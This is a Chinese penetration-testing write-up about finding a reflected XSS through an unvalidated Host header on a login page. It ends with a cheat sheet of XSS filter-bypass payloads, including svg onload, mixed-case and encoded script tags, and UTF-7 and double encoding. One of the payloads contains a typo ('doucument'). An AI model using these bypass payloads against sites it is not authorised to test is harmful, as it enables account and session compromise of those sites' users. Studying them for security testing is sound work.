某天在挖洞时,噼里啪啦一顿信息收集之后发现了个登陆界面如下:
抓请求包
试着把整个host头的值替换成www.baidu.com
host头的值确实会完全展示在页面中,接下来就是与XSS过滤器的一番殊死搏斗了,payload很简单就被执行了。。。。。。直接在之前的参数后面添加payload: ’;prompt`1`;’(此处省去简单的XSS绕过过程),重放数据包:
刷新前台页面
最后附上常用的验证xss的payload
accesskey="X" onclick=location="aler"+"t`1`"(按键触发,针对于input标签的hidden属性)<svg/onload=confirm(doucument.domain)>(很多情况,都会忽略svg表签)"><sCrI%20pT%20>PrOmPt('1')</ScrI%20pt>"><sCrI%20pT%20>PrOmPt`1`</ScrI%20pt><script>alert(String.fromCharCode(88,83,83))</script>绕过<>:u003cimg src=1 onerror=alert(/xss/)u003e使用 utf-7 编码可以绕过,比如<script>alert("XSS")</script>使用 UTF-7编码:+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-然后所有的加号需要被改成%2b,否则会被浏览器识别为连接符%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-最后可以将XSS PAYLOAD进行html编码后再进行URL编码,有时候也会有不错的收获。